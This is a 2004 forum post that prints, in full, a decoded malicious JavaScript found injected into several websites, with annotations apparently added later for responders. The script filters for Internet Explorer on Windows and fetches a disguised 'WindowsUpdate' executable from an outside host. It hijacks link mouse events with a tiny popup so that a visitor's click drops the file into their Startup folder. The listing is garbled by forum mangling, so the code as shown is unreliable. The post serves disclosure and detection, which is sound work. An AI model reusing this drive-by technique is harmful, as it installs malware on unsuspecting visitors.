Old 10-31-2004, 08:29 PM  
Germes
Snake, this code was found on snakesworld and pornno when viewed from many machines (mostly UNIX), so I doubt they could all be infected.

Please show us the code you have between

Copyright
1997-2004</FONT></FONT>
</CENTER>

and

</BODY></HTML>

We can all see encoded JavaScript there.
Here you can see this script decoded:

// Script-wide state shared by the functions below.
// NOTE(review): this listing was mangled by the forum software: "hahahaha" stands where a
// comparison operator (most likely "==") was, and stray spaces were inserted into long
// tokens ("s tyle", "wind ow"). Treat it as a reading copy of the sample, not runnable code.
var pop;        // popup object created by window.createPopup() in initpop()
var uploaded;   // truthy once the visitor is filtered out or the click sequence has run
var obj;        // element the mouse last moved over (set in showpop, clicked in DoClick)
var burl;       // URL of the .exe referenced by the popup's <img dynsrc>
var hiddenImg;  // declared but never used in the visible listing
var totalobj;   // document.all.length seen on the last SetAllEvents pass

/**
 * Visitor filter: returns 1 when the script should stay dormant for this visitor and
 * undefined (falsy) otherwise.
 *
 * The filter runs in the browser, so the script itself is delivered to every client; only
 * Internet Explorer on Win32 with cookies enabled gets past these checks. That is why the
 * code shows up in the page source when fetched from non-Windows machines.
 */
function BadBrowser()
{
// Not Internet Explorer: skip.
if(navigator.appName!="Microsoft Internet Explorer")
return 1;
// Cookies disabled: skip (the once-per-browser marker below could not be stored).
if(!navigator.cookieEnabled)
return 1;
// Not 32-bit Windows: skip.
if(navigator.platform!="Win32")
return 1;
// NOTE(review): "hahahaha" is forum mangling, most likely of "=="; read as: skip when the
// user agent contains neither "MSIE 5.5" nor "MSIE 6.".
if(navigator.userAgent.indexOf("MSIE 5.5")hahahaha-1 && navigator.userAgent.indexOf("MSIE 6.")hahahaha-1)
return 1;
// Marker cookie written by DoClick() is present: this browser was already processed.
if(document.cookie.indexOf("msip=6x")>-1)
return 1;
}

// Run the visitor filter once at load time; a truthy result disables everything below.
uploaded=BadBrowser();


// Build the executable's URL only for visitors that passed the filter. The file name poses
// as "WindowsUpdate" and carries five characters taken from Math.random(), so it differs on
// every page load; exact-URL blocklists will miss it, match on host and path prefix instead.
if(!uploaded)
{
burl="http://www.rockyspornpalace.com/ad/banners/29406/82405/WindowsUpdate"+(Math.random()+" ").substr(2,5)+".exe";
}

/**
 * Creates the IE popup object once (window.createPopup) and fills its body with generated
 * HTML: an anchor carrying mouse handlers and a hidden <DIV ID="client"> holding an
 * <img dynsrc=...> that points at the executable URL in burl.
 *
 * Handlers embedded in the generated markup:
 *   onBlur      - hides the page's "i_frame" element
 *   onMouseOut  - hides the "client" image container
 *   OnMouseOver - shows the "client" image container
 *   onMouseDown - shows "i_frame", re-shows the popup at 1x1, sets parent.uploaded=1 and
 *                 calls parent.DoClick()
 *
 * Strings worth searching for when hunting this sample in page templates:
 * "createPopup", "dynsrc" with an ".exe" URL, "i_frame".
 */
function initpop()
{
// Build the popup only once per page.
if(!pop)
{
pop=window.createPopup();
var oBody = pop.document.body;


// Black, borderless body pinned to the popup's top-left corner.
pop.document.bgColor="black";
oBody.style.border = "solid black 0px";
oBody.style.position="absolute";
oBody.style.left= "0";
oBody.style.top= "0";
var temp;
// NOTE(review): the stray spaces inside the string below ("s tyle", "i_fr ame", "sho w")
// are forum mangling; the "\" at line ends are string continuations, so no comment can be
// placed between those lines.
temp='<DIV style="position:relative;"><a href="'+"#\" onBlur='parent.document.getElementById(\"i_frame\" ).style.visibility=\"hidden\"' ";
temp+=
"onMouseOut='document.getElementById(\"client\").s tyle.visibility=\"hidden\"' \
OnMouseOver='document.getElementById(\"client\").s tyle.visibility=\"visible\"' \
onMouseDown='parent.document.getElementById(\"i_fr ame\").style.visibility=\"visible\";parent.pop.sho w(1,1,1,1);parent.uploaded=1;parent.DoClick();'> \
I\
<DIV ID=\"client\" STYLE=\"visibility:hidden; position:absolute; top:-25; left:-25;\">\
<img nocache border=1 style=\"width=500px;heigth=500px; cursor:hand;\" dynsrc=\""+burl+"\" ></div></a></div>";


// Install the generated markup as the popup's content.
oBody.innerHTML=temp;
}
}

/**
 * Page-unload handler (assigned to window.onbeforeunload by the top-level code): marks the
 * sequence as finished and hides the popup if one was created.
 */
function clean()
{
uploaded=1;
if(pop)
pop.hide();
}

// For visitors that passed the filter: build the popup immediately and make sure it is
// hidden again when the page is left.
if(!uploaded)
{
initpop();
window.onbeforeunload=clean;
}


/**
 * Called from the popup's onMouseDown handler. Writes the "msip=6x" marker cookie (path "/",
 * expiry 31 Dec 2005) that BadBrowser() checks, so the sequence runs once per browser, then
 * re-fires a click on the element stored in obj after 300 ms.
 *
 * For responders: a "msip=6x" cookie for the affected site in an IE profile indicates that
 * this handler ran in that browser.
 */
function DoClick()
{
document.cookie="msip=6x; path=/; expires=Mon, 31 Dec 2005 23:59:59 UTC;";
// String argument: evaluated as script when the timer fires.
window.setTimeout('obj.click();',300);
}

/**
 * onmousemove handler that SetAllEvents() attaches to the page's links. Does nothing once
 * uploaded is set. Otherwise it remembers the element under the pointer in obj, makes sure
 * the popup exists, shows it as a 1x1 window at the pointer's screen position and moves the
 * "i_frame" element to the matching position inside the page.
 * NOTE(review): the apparent intent is that the visitor's next mouse press on the link lands
 * on the popup content instead of the link itself; inferred from the handlers in initpop().
 */
function showpop()
{
if(uploaded)
return;
// Element the event originated from (IE event model).
obj=window.event.srcElement;
if(!pop)
{
initpop();
}

// NOTE(review): "wind ow" / "windo w" below are forum mangling of "window".
pop.show(window.event.screenX,window.event.screenY ,1,1);
// Convert screen coordinates to page coordinates for the "i_frame" container.
document.getElementById("i_frame").style.left=wind ow.event.screenX-window.screenLeft-document.body.clientLeft+document.body.scrollLeft;
document.getElementById("i_frame").style.top=windo w.event.screenY-window.screenTop-document.body.clientTop+document.body.scrollTop;
}


/**
 * Self-rescheduling poller (every 400 ms). When the popup document reports "complete" and
 * the page's element count differs from the last pass, it assigns showpop as the
 * onmousemove handler of every <A> element except the script's own "clientcall" anchor,
 * replacing whatever handler the page had set.
 * NOTE(review): "hahahaha" is forum mangling, most likely of "=="; the loop counter i is
 * never declared, so it would be an implicit global.
 */
function SetAllEvents()
{
if(pop.document.readyStatehahahaha"complete" && totalobj!=document.all.length)
{
// Remember the count so the loop only re-runs when the DOM has grown or shrunk.
totalobj=document.all.length;
for(i = 0; i < document.all.length; i++){
if(document.all(i).tagNamehahahaha"A" && document.all(i).id!="clientcall")
document.all(i).onmousemove=showpop;}
}
// String argument: evaluated as script on each tick.
setTimeout("SetAllEvents();", 400);
}

// Page-load setup for visitors that passed the filter.
// Strings worth searching for in served pages, templates and proxy logs when hunting this
// sample: "shell:startup", "#default#AnchorClick", "clientcall", "clientframe", "i_frame".
if(!uploaded)
{
// Start the link-hooking poller.
setTimeout("SetAllEvents();", 400);
// Blank the status bar text after two seconds.
window.setTimeout('window.defaultStatus=" "',2000);

// Hidden 1x1 clipping container with an oversized, offset iframe named "clientframe".
document.write('<div id=i_frame name=i_frame STYLE="visibility:hidden;position:absolute;top=0;l eft=0;width:1;height:1;overflow:hidden"><iframe frameborder="1" name="clientframe" id="clientframe" style="position:relative;top=-250;left=-440;width:700;height:700;"></iframe></div>');
// Hidden anchor using IE's AnchorClick behavior with folder="shell:startup", targeted at
// that iframe, then clicked from script.
// NOTE(review): presumably this opens a view of the user's Startup folder inside
// "clientframe"; on machines that visited the page, check that folder for unexpected files.
document.write('<a folder="shell:startup" target="clientframe" id="clientcall" style="visibility:hidden;display:none;behavior:url (#default#AnchorClick);"></a>');
document.getElementById("clientcall").click();
// Additional hidden about:blank iframe; its purpose is not evident from the listing.
document.write('<iframe src="about:blank" style="visibility:hidden;display:none;"></iframe>');
}
__________________
http://www.germesia.com/